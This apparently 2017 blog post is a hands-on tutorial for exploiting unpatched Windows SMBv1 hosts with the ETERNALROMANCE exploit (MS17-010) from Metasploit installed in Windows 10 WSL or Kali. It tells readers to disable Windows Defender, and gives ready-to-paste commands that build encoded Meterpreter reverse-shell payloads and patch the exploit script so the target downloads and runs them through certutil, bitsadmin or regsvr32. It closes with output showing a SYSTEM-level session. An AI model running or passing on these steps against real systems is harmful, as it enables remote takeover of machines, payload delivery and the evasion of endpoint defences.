Exploiting with EternalRomance using Metasploit installed inside Win10 WSL

This post will have a few sections. We will get some general information of the ETERNALROMANCE exploit, learn how to install WSL on Win10 Creators Update, along with Metasploit. As a bonus I will show how to do this on Kali, and show a few different additional tricks to download payloads to the target machine.

The original ETERNALROMANCE is a remote code execution (RCE) exploit targeting legacy SMBv1 that came from a leak on April 14, 2017, by a group calling themselves the Shadow Brokers. It was part weaponized exploit collection attributed to NSA and Equation Group called Lost_In_Translation, which targeted Windows XP/Vista/7 and Windows Server 2003/2008. It takes advantage of CVE-2017-0145, which has been patched by the MS17-010 security bulletin. File sharing over SMB is normally used only within local networks, if an attacker has access to a vulnerable endpoint running SMB the can gain SYSTEM privileges. ETERNALROMANCE takes advantage of a bug in access to named pipes, more in depth information can be found here.

The original exploit required that you generate shellcode using DoublePulsar which was also in the dump. There has been a few posts demonstrating this when the it first hit the net. But, being limited to their shellcode, and if you tried to use other shellcode the exploit would blue screen the target machine. Also you were not able to exploit any newer machines above Server 2008.

We will be using some updated python code from sleepya that fixes some issues (BSOD) with the original code of ETERNALROMANCE’s and allows compatibility to exploit Windows 2000/XP/Vista/7/8.1/2008 R2/2012 R2/2016 R2.
ETERNALROMANCE requires authentication, either through a Guest account, if it’s enabled, otherwise, we would have to previously obtained a username and password from the target machine. For this demonstration we will assume the target machine has Guest enabled. *Even if it is a Guest account, the exploit gives us SYSTEM privileges.

To start off I am going to assume you already have the Creators Update installed on Windows 10 (which solves some issues on WSL with ping finally, but Nmap is still jacked up :/ ).

Installing WSL Ubuntu:

Turn on Developer Mode
Open Settings -> Update and Security -> For developers
Select the Developer Mode radio button


Open a command prompt. Run bash

Accept the license, the Ubuntu image will download and install.

Launch a new Ubuntu shell by running bash from a cmd or powershell prompt or by typing bash in the start menu and clicking it. Create a new user and password,
then run sudo apt-get update && sudo apt-get upgrade -y since the image will be behind. You should be ready to go to install Metasploit now.


Installing Metasploit:

Most of this info I borrowed from Darkoperator’s blog post since essentially it’s the same idea of installing Metasploit on Ubuntu. You want to disable Window Defender and also add an exclusion to %userprofile%\AppData\Local\lxss inside Windows Defender’s settings otherwise it might break the install of some of the payloads etc that are detected. In your bash window you’re going to paste all these commands and make sure you dont get any errors.

sudo add-apt-repository -y ppa:webupd8team/java
sudo apt-get update
sudo apt-get -y install oracle-java8-installer
sudo apt-get update
sudo apt-get upgrade
sudo apt-get install build-essential libreadline-dev libssl-dev libpq5 libpq-dev libreadline5 libsqlite3-dev libpcap-dev git-core autoconf postgresql pgadmin3 curl zlib1g-dev libxml2-dev libxslt1-dev vncviewer libyaml-dev curl zlib1g-dev

cd ~
git clone git://github.com/sstephenson/rbenv.git .rbenv
echo 'export PATH="$HOME/.rbenv/bin:$PATH"' >> ~/.bashrc
echo 'eval "$(rbenv init -)"' >> ~/.bashrc
exec $SHELL

git clone git://github.com/sstephenson/ruby-build.git ~/.rbenv/plugins/ruby-build
echo 'export PATH="$HOME/.rbenv/plugins/ruby-build/bin:$PATH"' >> ~/.bashrc

git clone git://github.com/dcarley/rbenv-sudo.git ~/.rbenv/plugins/rbenv-sudo
exec $SHELL
RUBYVERSION=$(wget https://raw.githubusercontent.com/rapid7/metasploit-framework/master/.ruby-version -q -O - )
rbenv install $RUBYVERSION
rbenv global $RUBYVERSION
ruby -v

Right about this time you’ll want to get some coffee or Monster because ruby is going to a long time to finish. Once finished it should post the version that installed. Now were going to skip a few steps like setting up postgresql and Nmap because we wont need a DB now and Nmap is not working currently in WSL. So lets move on to getting Metasploit installed.

cd /opt
sudo git clone https://github.com/rapid7/metasploit-framework.git
cd metasploit-framework
gem install bundler
bundle install
sudo bash -c 'for MSF in $(ls msf*); do ln -s /opt/metasploit-framework/$MSF /usr/local/bin/$MSF;done'

So hopefully at this point you should have Metasploit installed. You can test it by typing msfconsolein the bash prompt.


Exploiting the Target
Now comes the easy part, I’ll give you some easy commands you can type in 3 different bash windows. Open the windows one at a time , the Metasploit handler will take a bit to startup, so you can open a second window and create a msfvenom payload, which will also take a little bit to finish creating and encoding. Once both of those are finished, open a 3rd bash window and paste the commands, it should download the EternalRomance python and smb.py to help exploit our target and should automagically change your IP and our new download payload using sed to replace the default stuff. I chose to use certutil to download our msfvenom meterpreter payload from our python SimpleHTTpServer and then execute it.

With your open msconsole window test our target IP first to see if it’s exploitable:
use auxiliary/scanner/smb/pipe_auditor
set RHOSTS [TargetIP]
exploit

if your target machine is exploitable then continue with the next step of opening the 3 bash windows. you can also choose to use any pipe name ‘netlogon’, ‘spoolss’, ‘browser’ etc… when using EternalRomance.py in window 3 (i chose ‘netlogon’) also dont forget to change the to your target’s IP.


Bash Window #1 – MetaSploit Handler

IP=`ifconfig wifi0 | grep "inet addr" |awk -F: '{print $2}'| awk '{print $1}'`
msfconsole -qx "use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp;set LHOST '$IP';set ExitOnSession false;exploit -j -z"

Bash Window #2 – Created msfvenom payload and started python webserver
IP=`ifconfig wifi0 | grep "inet addr" |awk -F: '{print $2}'| awk '{print $1}'`
msfvenom -p windows/meterpreter/reverse_tcp LHOST=$IP -e shikata_ga_nai -i 3 -f exe > 1.exe
sudo python -m SimpleHTTPServer 80

Bash Window #3 – Download EternalRomance, edit it, & exploit victim
IP=`ifconfig wifi0 | grep "inet addr" |awk -F: '{print $2}'| awk '{print $1}'`
wget https://www.exploit-db.com/download/42315 -O EternalRomance.py
wget https://github.com/worawit/MS17-010/raw/master/mysmb.py
sed -i -e "s/USERNAME = ''/USERNAME = 'GUEST'/g" -e 's/#service_exec(conn, r'\''cmd \/c copy c:\\pwned.txt c:\\pwned_exec.txt'\'')/service_exec(conn, r'\''cmd \/c certutil -urlcache -split -f http:\/\/'$IP'\/1.exe C:\\1.exe \&\& C:\\1.exe'\'')/g' EternalRomance.py

python EternalRomance.py [TargetIP] netlogon


If all goes well you should see a new meterpreter session open from your target. 🙂


Kali VM EternalRomance exploiting info:

It will be just about the same and the information above except few a different commands…

#1. – Test Target IP first to see if exploitable
msfconsole
use auxiliary/scanner/smb/pipe_auditor
set RHOSTS [TargetIP]
exploit

*choose any pipe name ‘netlogon’, ‘spoolss’, ‘browser’ etc…

#2 – Create Metasploit Handler
IP=`ip -4 addr show eth0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}'`
msfconsole -qx "use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp;set LHOST '$IP';set ExitOnSession false;exploit -j -z"

#3. – Grab Exploit Scripts in console 2
wget https://www.exploit-db.com/download/42315-O EternalRomance.py
wget https://github.com/worawit/MS17-010/raw/master/mysmb.py

#4a. – Payload Choice #1 – Create EXE payload using bitsadmin dl and execute
msfvenom -p windows/meterpreter/reverse_tcp LHOST=$IP -f exe-service > /var/www/html/1.exe
IP=`ip -4 addr show eth0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}'`
sed -i -e "s/USERNAME = ''/USERNAME = 'GUEST'/g" -e 's/#service_exec(conn, r'\''cmd \/c copy c:\\pwned.txt c:\\pwned_exec.txt'\'')/service_exec(conn, r'\''cmd \/c bitsadmin \/transfer wcb \/priority high http:\/\/'$IP'\/1.exe C:\\1.exe \&\& C:\\1.exe'\'')/g' EternalRomance.py

#4b. – Payload Choice #2 – Create SCT payload with regsvr32 dl with scrobj.dll
git clone https://github.com/CroweCybersecurity/ps1encode .
IP=`ip -4 addr show eth0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}'`
echo $IP | ruby ps1encode.rb --PAYLOAD windows/meterpreter/reverse_tcp --LHOST='puts ARGF.read' --LPORT=4444 -t sct
chmod +x ./index.sct && mv ./index.sct /var/www/html/1.sct
sed -i -e "s/USERNAME = ''/USERNAME = 'GUEST'/g" -e 's/#service_exec(conn, r'\''cmd \/c copy c:\\pwned.txt c:\\pwned_exec.txt'\'')/service_exec(conn, r'\''regsvr32 \/s \/n \/u \/i:http:\/\/'$IP'\/1.sct scrobj.dll'\'')/g' EternalRomance.py

Credits for this regsvr32 payload idea:Sheila Berta / Casey Smith / CroweCybersecurity
#5. – Start Webserver
service apache2 start

##################################
# Exploit it(change the TargetIP and named pipe if you want)
python EternalRomance.py [TargetIP] netlogon

If all goes well a shell shall rain down on ya.
[*] Sending stage (957487 bytes) to 192.168.128.19
[*] Meterpreter session 1 opened (192.168.128.17:4444 -> 192.168.128.19:49176) at 2017-09-30 05:08:42 -0400
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1…
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

If I missed anything or something needs correcting hit me up on Twitter.

Bookmark the permalink.

Leave a Reply

Your email address will not be published. Required fields are marked *